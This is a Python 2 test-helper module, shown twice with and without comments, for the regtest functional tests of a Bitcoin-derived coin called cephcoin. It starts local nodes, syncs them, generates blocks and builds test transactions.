or not os.path.isdir(os.path.join("cache","node3"))):
#find and delete old cache directories if any exist
for i in range(4):
if os.path.isdir(os.path.join("cache","node"+str(i))):
shutil.rmtree(os.path.join("cache","node"+str(i)))
# Create cache directories, run cephcoinds:
for i in range(4):
datadir=initialize_datadir("cache", i)
args = [ os.getenv("CEPHD", "cephcoind"), "-server", "-keypool=1", "-datadir="+datadir, "-discover=0" ]
if i > 0:
args.append("-connect=127.0.0.1:"+str(p2p_port(0)))
bitcoind_processes[i] = subprocess.Popen(args)
if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: cephcoind started, waiting for RPC to come up"
wait_for_bitcoind_start(bitcoind_processes[i], rpc_url(i), i)
if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: RPC succesfully started"
rpcs = []
for i in range(4):
try:
rpcs.append(get_rpc_proxy(rpc_url(i), i))
except:
sys.stderr.write("Error connecting to "+url+"\n")
sys.exit(1)
# Create a 200-block-long chain; each of the 4 nodes
# gets 25 mature blocks and 25 immature.
# blocks are created with timestamps 156 seconds apart
# starting from 31356 seconds in the past
enable_mocktime()
block_time = get_mocktime() - (201 * 156)
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(rpcs, block_time)
rpcs[peer].generate(1)
block_time += 156
# Must sync before next peer starts generating blocks
sync_blocks(rpcs)
# Shut them down, and clean up cache directories:
stop_nodes(rpcs)
wait_bitcoinds()
disable_mocktime()
for i in range(4):
os.remove(log_filename("cache", i, "debug.log"))
os.remove(log_filename("cache", i, "db.log"))
os.remove(log_filename("cache", i, "peers.dat"))
os.remove(log_filename("cache", i, "fee_estimates.dat"))
for i in range(4):
from_dir = os.path.join("cache", "node"+str(i))
to_dir = os.path.join(test_dir, "node"+str(i))
shutil.copytree(from_dir, to_dir)
initialize_datadir(test_dir, i) # Overwrite port/rpcport in cephcoin.conf
def initialize_chain_clean(test_dir, num_nodes):
"""
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization.
"""
for i in range(num_nodes):
datadir=initialize_datadir(test_dir, i)
def _rpchost_to_args(rpchost):
'''Convert optional IP:port spec to rpcconnect/rpcport args'''
if rpchost is None:
return []
match = re.match('(\[[0-9a-fA-f:]+\]|[^:]+)(?::([0-9]+))?$', rpchost)
if not match:
raise ValueError('Invalid RPC host spec ' + rpchost)
rpcconnect = match.group(1)
rpcport = match.group(2)
if rpcconnect.startswith('['): # remove IPv6 [...] wrapping
rpcconnect = rpcconnect[1:-1]
rv = ['-rpcconnect=' + rpcconnect]
if rpcport:
rv += ['-rpcport=' + rpcport]
return rv
def start_node(i, dirname, extra_args=None, rpchost=None, timewait=None, binary=None):
"""
Start a cephcoind and return RPC connection to it
"""
datadir = os.path.join(dirname, "node"+str(i))
if binary is None:
binary = os.getenv("CEPHD", "cephcoind")
# RPC tests still depend on free transactions
args = [ binary, "-datadir="+datadir, "-server", "-keypool=1", "-discover=0", "-rest", "-blockprioritysize=50000", "-mocktime="+str(get_mocktime()) ]
if extra_args is not None: args.extend(extra_args)
bitcoind_processes[i] = subprocess.Popen(args)
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: cephcoind started, waiting for RPC to come up"
url = rpc_url(i, rpchost)
wait_for_bitcoind_start(bitcoind_processes[i], url, i)
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: RPC succesfully started"
proxy = get_rpc_proxy(url, i, timeout=timewait)
if COVERAGE_DIR:
coverage.write_all_rpc_commands(COVERAGE_DIR, proxy)
return proxy
def start_nodes(num_nodes, dirname, extra_args=None, rpchost=None, binary=None):
"""
Start multiple cephcoinds, return RPC connections to them
"""
if extra_args is None: extra_args = [ None for i in range(num_nodes) ]
if binary is None: binary = [ None for i in range(num_nodes) ]
rpcs = []
try:
for i in range(num_nodes):
rpcs.append(start_node(i, dirname, extra_args[i], rpchost, binary=binary[i]))
except: # If one node failed to start, stop the others
stop_nodes(rpcs)
raise
return rpcs
def log_filename(dirname, n_node, logname):
return os.path.join(dirname, "node"+str(n_node), "regtest", logname)
def stop_node(node, i):
node.stop()
bitcoind_processes[i].wait()
del bitcoind_processes[i]
def stop_nodes(nodes):
for node in nodes:
node.stop()
del nodes[:] # Emptying array closes connections as a side effect
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def wait_bitcoinds():
# Wait for all bitcoinds to cleanly exit
for bitcoind in bitcoind_processes.values():
bitcoind.wait()
bitcoind_processes.clear()
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:"+str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
while any(peer['version'] == 0 for peer in from_connection.getpeerinfo()):
time.sleep(0.1)
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def find_output(node, txid, amount):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found"%(txid,str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >=0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({ "txid" : t["txid"], "vout" : t["vout"], "address" : t["address"] } )
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d"%(amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out+fee
change = amount_in - amount
if change > amount*2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change/2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
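# Worked example for make_change (hypothetical Decimal amounts):
# amount_in=50, amount_out=10, fee=0.001 -> amount=10.001, change=39.999.
# Since 39.999 > 2*10.001 the change is split: the extra output gets
# 19.99950000 (change/2 rounded down to 8 places) and the remaining 19.9995
# goes to a fresh address, i.e. two change outputs instead of one large one.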
def send_zeropri_transaction(from_node, to_node, amount, fee):
"""
Create&broadcast a zero-priority transaction.
Returns (txid, hex-encoded-txdata)
Ensures transaction is zero-priority by first creating a send-to-self,
then using its output
"""
# Create a send-to-self with confirmed inputs:
self_address = from_node.getnewaddress()
(total_in, inputs) = gather_inputs(from_node, amount+fee*2)
outputs = make_change(from_node, total_in, amount+fee, fee)
outputs[self_address] = float(amount+fee)
self_rawtx = from_node.createrawtransaction(inputs, outputs)
self_signresult = from_node.signrawtransaction(self_rawtx)
self_txid = from_node.sendrawtransaction(self_signresult["hex"], True)
vout = find_output(from_node, self_txid, amount+fee)
# Now immediately spend the output to create a 1-input, 1-output
# zero-priority transaction:
inputs = [ { "txid" : self_txid, "vout" : vout } ]
outputs = { to_node.getnewaddress() : float(amount) }
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"])
def random_zeropri_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random zero-priority transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(txid, txhex) = send_zeropri_transaction(from_node, to_node, amount, fee)
return (txid, txhex, fee)
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount+fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
def assert_equal(thing1, thing2):
if thing1 != thing2:
raise AssertionError("%s != %s"%(str(thing1),str(thing2)))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s"%(str(thing1),str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
try:
fun(*args, **kwds)
except exc:
pass
except Exception as e:
raise AssertionError("Unexpected exception raised: "+type(e).__name__)
else:
raise AssertionError("No exception raised")
def assert_is_hex_string(string):
try:
int(string, 16)
except Exception as e:
raise AssertionError(
"Couldn't interpret %r as hexadecimal; raised: %s" % (string, e))
def assert_is_hash_string(string, length=64):
if not isinstance(string, basestring):
raise AssertionError("Expected a string, got type %r" % type(string))
elif length and len(string) != length:
raise AssertionError(
"String of length %d expected; got %d" % (length, len(string)))
elif not re.match('[abcdef0-9]+$', string):
raise AssertionError(
"String %r contains invalid characters for a hash." % string)
def assert_array_result(object_array, to_match, expected, should_not_find = False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found
in object_array
"""
if should_not_find == True:
assert_equal(expected, { })
num_matched = 0
for item in object_array:
all_match = True
for key,value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
elif should_not_find == True:
num_matched = num_matched+1
for key,value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s"%(str(item), str(key), str(value)))
num_matched = num_matched+1
if num_matched == 0 and should_not_find != True:
raise AssertionError("No objects matched %s"%(str(to_match)))
if num_matched > 0 and should_not_find == True:
raise AssertionError("Objects were found %s"%(str(to_match)))
def satoshi_round(amount):
return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
# Helper to create at least "count" utxos
# Pass in a fee that is sufficient for relay and mining new transactions.
def create_confirmed_utxos(fee, node, count):
node.generate(int(0.5*count)+101)
utxos = node.listunspent()
iterations = count - len(utxos)
addr1 = node.getnewaddress()
addr2 = node.getnewaddress()
if iterations <= 0:
return utxos
for i in xrange(iterations):
t = utxos.pop()
inputs = []
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr1] = satoshi_round(send_value/2)
outputs[addr2] = satoshi_round(send_value/2)
raw_tx = node.createrawtransaction(inputs, outputs)
signed_tx = node.signrawtransaction(raw_tx)["hex"]
txid = node.sendrawtransaction(signed_tx)
while (node.getmempoolinfo()['size'] > 0):
node.generate(1)
utxos = node.listunspent()
assert(len(utxos) >= count)
return utxos
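# Rough accounting for create_confirmed_utxos: generate(int(0.5*count)+101)
# leaves roughly count/2 spendable coinbase outputs (coinbase outputs mature
# only after about 100 further blocks, hence the +101), and each loop
# iteration spends one UTXO into two halves, netting +1 UTXO per pass, so
# after `iterations` passes and mining out the mempool at least `count`
# spendable outputs exist.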
# Create large OP_RETURN txouts that can be appended to a transaction
# to make it large (helper for constructing large transactions).
def gen_return_txouts():
# Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create
# So we have big transactions (and therefore can't fit very many into each block)
# create one script_pubkey
script_pubkey = "6a4d0200" #OP_RETURN OP_PUSH2 512 bytes
for i in xrange (512):
script_pubkey = script_pubkey + "01"
# concatenate 128 txouts of above script_pubkey which we'll insert before the txout for change
txouts = "81"
for k in xrange(128):
# add txout value
txouts = txouts + "0000000000000000"
# add length of script_pubkey
txouts = txouts + "fd0402"
# add script_pubkey
txouts = txouts + script_pubkey
return txouts
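# Size sketch for the blob built above: the script is 4 header bytes
# ("6a4d0200", OP_RETURN plus an OP_PUSHDATA2 length field) followed by 512
# bytes of 0x01 data, i.e. 516 script bytes, which matches the "fd0402"
# compact-size (little-endian 516) written before it. Each of the 128 spliced
# txouts is therefore an 8-byte zero value + 3-byte compact size + 516-byte
# script = 527 bytes, so create_lots_of_big_transactions grows each
# transaction by roughly 128 * 527 = 67,456 bytes; the leading "81" becomes
# the new output count (0x81 = 129: the original change output plus the 128
# OP_RETURN outputs).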
def create_tx(node, coinbase, to_address, amount):
inputs = [{ "txid" : coinbase, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
assert_equal(signresult["complete"], True)
return signresult["hex"]
# Create a spend of each passed-in utxo, splicing in "txouts" to each raw
# transaction to make it large. See gen_return_txouts() above.
def create_lots_of_big_transactions(node, txouts, utxos, fee):
addr = node.getnewaddress()
txids = []
for i in xrange(len(utxos)):
t = utxos.pop()
inputs = []
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr] = satoshi_round(send_value)
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + txouts
newtx = newtx + rawtx[94:]
signresult = node.signrawtransaction(newtx, None, None, "NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
txids.append(txid)
return txids
def get_bip9_status(node, key):
info = node.getblockchaininfo()
for row in info['bip9_softforks']:
if row['id'] == key:
return row
raise IndexError ('key:"%s" not found' % key)
| 35.356209
| 153
| 0.652509
|
import os
import sys
from binascii import hexlify, unhexlify
from base64 import b64encode
from decimal import Decimal, ROUND_DOWN
import json
import random
import shutil
import subprocess
import time
import re
import errno
from . import coverage
from .authproxy import AuthServiceProxy, JSONRPCException
COVERAGE_DIR = None
MOCKTIME = 0
def enable_mocktime():
global MOCKTIME
MOCKTIME = 1417713337 + (201 * 156)
def disable_mocktime():
global MOCKTIME
MOCKTIME = 0
def get_mocktime():
return MOCKTIME
def enable_coverage(dirname):
"""Maintain a log of which RPC calls are made during testing."""
global COVERAGE_DIR
COVERAGE_DIR = dirname
def get_rpc_proxy(url, node_number, timeout=None):
"""
Args:
url (str): URL of the RPC server to call
node_number (int): the node number (or id) that this calls to
Kwargs:
timeout (int): HTTP timeout in seconds
Returns:
AuthServiceProxy. convenience object for making RPC calls.
"""
proxy_kwargs = {}
if timeout is not None:
proxy_kwargs['timeout'] = timeout
proxy = AuthServiceProxy(url, **proxy_kwargs)
proxy.url = url
coverage_logfile = coverage.get_filename(
COVERAGE_DIR, node_number) if COVERAGE_DIR else None
return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile)
def get_mnsync_status(node):
result = node.mnsync("status")
return result['IsSynced']
def wait_to_sync(node):
synced = False
while not synced:
synced = get_mnsync_status(node)
time.sleep(0.5)
def p2p_port(n):
return 11000 + n + os.getpid()%999
def rpc_port(n):
return 12000 + n + os.getpid()%999
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def count_bytes(hex_string):
return len(bytearray.fromhex(hex_string))
def bytes_to_hex_str(byte_str):
return hexlify(byte_str).decode('ascii')
def hex_str_to_bytes(hex_str):
return unhexlify(hex_str.encode('ascii'))
def str_to_b64str(string):
return b64encode(string.encode('utf-8')).decode('ascii')
def sync_blocks(rpc_connections, wait=1):
"""
Wait until everybody has the same block count
"""
while True:
counts = [ x.getblockcount() for x in rpc_connections ]
if counts == [ counts[0] ]*len(counts):
break
time.sleep(wait)
def sync_mempools(rpc_connections, wait=1):
"""
Wait until everybody has the same transactions in their memory
pools
"""
while True:
pool = set(rpc_connections[0].getrawmempool())
num_match = 1
for i in range(1, len(rpc_connections)):
if set(rpc_connections[i].getrawmempool()) == pool:
num_match = num_match+1
if num_match == len(rpc_connections):
break
time.sleep(wait)
def sync_masternodes(rpc_connections):
for node in rpc_connections:
wait_to_sync(node)
bitcoind_processes = {}
def initialize_datadir(dirname, n):
datadir = os.path.join(dirname, "node"+str(n))
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "cephcoin.conf"), 'w') as f:
f.write("regtest=1\n")
f.write("rpcuser=rt\n")
f.write("rpcpassword=rt\n")
f.write("port="+str(p2p_port(n))+"\n")
f.write("rpcport="+str(rpc_port(n))+"\n")
f.write("listenonion=0\n")
return datadir
def rpc_url(i, rpchost=None):
return "http://rt:rt@%s:%d" % (rpchost or '127.0.0.1', rpc_port(i))
def wait_for_bitcoind_start(process, url, i):
'''
Wait for cephcoind to start. This means that RPC is accessible and fully initialized.
Raise an exception if cephcoind exits during initialization.
'''
while True:
if process.poll() is not None:
raise Exception('cephcoind exited with status %i during initialization' % process.returncode)
try:
rpc = get_rpc_proxy(url, i)
blocks = rpc.getblockcount()
break
except IOError as e:
if e.errno != errno.ECONNREFUSED:
raise
except JSONRPCException as e:
if e.error['code'] != -28:
raise
time.sleep(0.25)
def initialize_chain(test_dir):
"""
Create (or copy from cache) a 200-block-long chain and
4 wallets.
"""
if (not os.path.isdir(os.path.join("cache","node0"))
or not os.path.isdir(os.path.join("cache","node1"))
or not os.path.isdir(os.path.join("cache","node2"))
or not os.path.isdir(os.path.join("cache","node3"))):
for i in range(4):
if os.path.isdir(os.path.join("cache","node"+str(i))):
shutil.rmtree(os.path.join("cache","node"+str(i)))
for i in range(4):
datadir=initialize_datadir("cache", i)
args = [ os.getenv("CEPHD", "cephcoind"), "-server", "-keypool=1", "-datadir="+datadir, "-discover=0" ]
if i > 0:
args.append("-connect=127.0.0.1:"+str(p2p_port(0)))
bitcoind_processes[i] = subprocess.Popen(args)
if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: cephcoind started, waiting for RPC to come up"
wait_for_bitcoind_start(bitcoind_processes[i], rpc_url(i), i)
if os.getenv("PYTHON_DEBUG", ""):
print "initialize_chain: RPC succesfully started"
rpcs = []
for i in range(4):
try:
rpcs.append(get_rpc_proxy(rpc_url(i), i))
except:
sys.stderr.write("Error connecting to "+url+"\n")
sys.exit(1)
enable_mocktime()
block_time = get_mocktime() - (201 * 156)
for i in range(2):
for peer in range(4):
for j in range(25):
set_node_times(rpcs, block_time)
rpcs[peer].generate(1)
block_time += 156
sync_blocks(rpcs)
stop_nodes(rpcs)
wait_bitcoinds()
disable_mocktime()
for i in range(4):
os.remove(log_filename("cache", i, "debug.log"))
os.remove(log_filename("cache", i, "db.log"))
os.remove(log_filename("cache", i, "peers.dat"))
os.remove(log_filename("cache", i, "fee_estimates.dat"))
for i in range(4):
from_dir = os.path.join("cache", "node"+str(i))
to_dir = os.path.join(test_dir, "node"+str(i))
shutil.copytree(from_dir, to_dir)
initialize_datadir(test_dir, i)
def initialize_chain_clean(test_dir, num_nodes):
"""
Create an empty blockchain and num_nodes wallets.
Useful if a test case wants complete control over initialization.
"""
for i in range(num_nodes):
datadir=initialize_datadir(test_dir, i)
def _rpchost_to_args(rpchost):
'''Convert optional IP:port spec to rpcconnect/rpcport args'''
if rpchost is None:
return []
    match = re.match(r'(\[[0-9a-fA-F:]+\]|[^:]+)(?::([0-9]+))?$', rpchost)
if not match:
raise ValueError('Invalid RPC host spec ' + rpchost)
rpcconnect = match.group(1)
rpcport = match.group(2)
if rpcconnect.startswith('['):
rpcconnect = rpcconnect[1:-1]
rv = ['-rpcconnect=' + rpcconnect]
if rpcport:
rv += ['-rpcport=' + rpcport]
return rv
def start_node(i, dirname, extra_args=None, rpchost=None, timewait=None, binary=None):
"""
Start a cephcoind and return RPC connection to it
"""
datadir = os.path.join(dirname, "node"+str(i))
if binary is None:
binary = os.getenv("CEPHD", "cephcoind")
args = [ binary, "-datadir="+datadir, "-server", "-keypool=1", "-discover=0", "-rest", "-blockprioritysize=50000", "-mocktime="+str(get_mocktime()) ]
if extra_args is not None: args.extend(extra_args)
bitcoind_processes[i] = subprocess.Popen(args)
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: cephcoind started, waiting for RPC to come up"
url = rpc_url(i, rpchost)
wait_for_bitcoind_start(bitcoind_processes[i], url, i)
if os.getenv("PYTHON_DEBUG", ""):
print "start_node: RPC succesfully started"
proxy = get_rpc_proxy(url, i, timeout=timewait)
if COVERAGE_DIR:
coverage.write_all_rpc_commands(COVERAGE_DIR, proxy)
return proxy
def start_nodes(num_nodes, dirname, extra_args=None, rpchost=None, binary=None):
"""
Start multiple cephcoinds, return RPC connections to them
"""
if extra_args is None: extra_args = [ None for i in range(num_nodes) ]
if binary is None: binary = [ None for i in range(num_nodes) ]
rpcs = []
try:
for i in range(num_nodes):
rpcs.append(start_node(i, dirname, extra_args[i], rpchost, binary=binary[i]))
except:
stop_nodes(rpcs)
raise
return rpcs
def log_filename(dirname, n_node, logname):
return os.path.join(dirname, "node"+str(n_node), "regtest", logname)
def stop_node(node, i):
node.stop()
bitcoind_processes[i].wait()
del bitcoind_processes[i]
def stop_nodes(nodes):
for node in nodes:
node.stop()
del nodes[:]
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def wait_bitcoinds():
for bitcoind in bitcoind_processes.values():
bitcoind.wait()
bitcoind_processes.clear()
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:"+str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
while any(peer['version'] == 0 for peer in from_connection.getpeerinfo()):
time.sleep(0.1)
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
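# Hedged example (illustration only): a typical start/connect/stop cycle using
# the helpers above.  The directory name is an assumption and must be writable.
def example_start_and_stop(dirname):
    initialize_chain_clean(dirname, 2)
    nodes = start_nodes(2, dirname)
    connect_nodes_bi(nodes, 0, 1)
    stop_nodes(nodes)
    wait_bitcoinds()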
def find_output(node, txid, amount):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found"%(txid,str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
    assert confirmations_required >= 0
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({ "txid" : t["txid"], "vout" : t["vout"], "address" : t["address"] } )
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d"%(amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out+fee
change = amount_in - amount
if change > amount*2:
change_address = from_node.getnewaddress()
outputs[change_address] = Decimal(change/2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
def send_zeropri_transaction(from_node, to_node, amount, fee):
"""
Create&broadcast a zero-priority transaction.
Returns (txid, hex-encoded-txdata)
Ensures transaction is zero-priority by first creating a send-to-self,
then using its output
"""
self_address = from_node.getnewaddress()
(total_in, inputs) = gather_inputs(from_node, amount+fee*2)
outputs = make_change(from_node, total_in, amount+fee, fee)
outputs[self_address] = float(amount+fee)
self_rawtx = from_node.createrawtransaction(inputs, outputs)
self_signresult = from_node.signrawtransaction(self_rawtx)
self_txid = from_node.sendrawtransaction(self_signresult["hex"], True)
vout = find_output(from_node, self_txid, amount+fee)
inputs = [ { "txid" : self_txid, "vout" : vout } ]
outputs = { to_node.getnewaddress() : float(amount) }
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"])
def random_zeropri_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random zero-priority transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(txid, txhex) = send_zeropri_transaction(from_node, to_node, amount, fee)
return (txid, txhex, fee)
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment*random.randint(0,fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount+fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
def assert_equal(thing1, thing2):
if thing1 != thing2:
raise AssertionError("%s != %s"%(str(thing1),str(thing2)))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s"%(str(thing1),str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
try:
fun(*args, **kwds)
except exc:
pass
except Exception as e:
raise AssertionError("Unexpected exception raised: "+type(e).__name__)
else:
raise AssertionError("No exception raised")
def assert_is_hex_string(string):
try:
int(string, 16)
except Exception as e:
raise AssertionError(
"Couldn't interpret %r as hexadecimal; raised: %s" % (string, e))
def assert_is_hash_string(string, length=64):
if not isinstance(string, basestring):
raise AssertionError("Expected a string, got type %r" % type(string))
elif length and len(string) != length:
raise AssertionError(
"String of length %d expected; got %d" % (length, len(string)))
elif not re.match('[abcdef0-9]+$', string):
raise AssertionError(
"String %r contains invalid characters for a hash." % string)
def assert_array_result(object_array, to_match, expected, should_not_find = False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found
in object_array
"""
if should_not_find == True:
assert_equal(expected, { })
num_matched = 0
for item in object_array:
all_match = True
for key,value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
elif should_not_find == True:
num_matched = num_matched+1
for key,value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s"%(str(item), str(key), str(value)))
num_matched = num_matched+1
if num_matched == 0 and should_not_find != True:
raise AssertionError("No objects matched %s"%(str(to_match)))
if num_matched > 0 and should_not_find == True:
raise AssertionError("Objects were found %s"%(str(to_match)))
def satoshi_round(amount):
return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
# Helper to create at least "count" utxos
# Pass in a fee that is sufficient for relay and mining new transactions.
def create_confirmed_utxos(fee, node, count):
node.generate(int(0.5*count)+101)
utxos = node.listunspent()
iterations = count - len(utxos)
addr1 = node.getnewaddress()
addr2 = node.getnewaddress()
if iterations <= 0:
return utxos
for i in xrange(iterations):
t = utxos.pop()
inputs = []
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr1] = satoshi_round(send_value/2)
outputs[addr2] = satoshi_round(send_value/2)
raw_tx = node.createrawtransaction(inputs, outputs)
signed_tx = node.signrawtransaction(raw_tx)["hex"]
txid = node.sendrawtransaction(signed_tx)
while (node.getmempoolinfo()['size'] > 0):
node.generate(1)
utxos = node.listunspent()
assert(len(utxos) >= count)
return utxos
# Create large OP_RETURN txouts that can be appended to a transaction
# to make it large (helper for constructing large transactions).
def gen_return_txouts():
# Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create
# So we have big transactions (and therefore can't fit very many into each block)
script_pubkey = "6a4d0200"
for i in xrange (512):
script_pubkey = script_pubkey + "01"
txouts = "81"
for k in xrange(128):
# add txout value
txouts = txouts + "0000000000000000"
# add length of script_pubkey
txouts = txouts + "fd0402"
# add script_pubkey
txouts = txouts + script_pubkey
return txouts
def create_tx(node, coinbase, to_address, amount):
inputs = [{ "txid" : coinbase, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
assert_equal(signresult["complete"], True)
return signresult["hex"]
# Create a spend of each passed-in utxo, splicing in "txouts" to each raw
# transaction to make it large. See gen_return_txouts() above.
def create_lots_of_big_transactions(node, txouts, utxos, fee):
addr = node.getnewaddress()
txids = []
for i in xrange(len(utxos)):
t = utxos.pop()
inputs = []
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr] = satoshi_round(send_value)
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + txouts
newtx = newtx + rawtx[94:]
signresult = node.signrawtransaction(newtx, None, None, "NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
txids.append(txid)
return txids
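# Hedged example (illustration only): how gen_return_txouts() and
# create_lots_of_big_transactions() above are meant to be combined to stuff the
# mempool with large transactions.  The fee and utxo count are assumptions.
def example_fill_mempool_with_big_txs(node):
    txouts = gen_return_txouts()
    utxos = create_confirmed_utxos(Decimal("0.001"), node, 50)
    return create_lots_of_big_transactions(node, txouts, utxos, Decimal("0.001"))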
def get_bip9_status(node, key):
info = node.getblockchaininfo()
for row in info['bip9_softforks']:
if row['id'] == key:
return row
    raise IndexError('key:"%s" not found' % key)
| false
| true
|
790b13e0719e348fcf4df241d8465987b32600d0
| 2,400
|
py
|
Python
|
algorithm_rgb.py
|
jvanderleeuw/template-rgb-plot-test
|
88d88eccfd182f293d217a04b7ecd40f7b03b9f0
|
[
"BSD-3-Clause"
] | 2
|
2020-02-07T16:08:39.000Z
|
2020-02-17T15:08:38.000Z
|
algorithm_rgb.py
|
jvanderleeuw/template-rgb-plot-test
|
88d88eccfd182f293d217a04b7ecd40f7b03b9f0
|
[
"BSD-3-Clause"
] | 5
|
2020-07-23T23:45:47.000Z
|
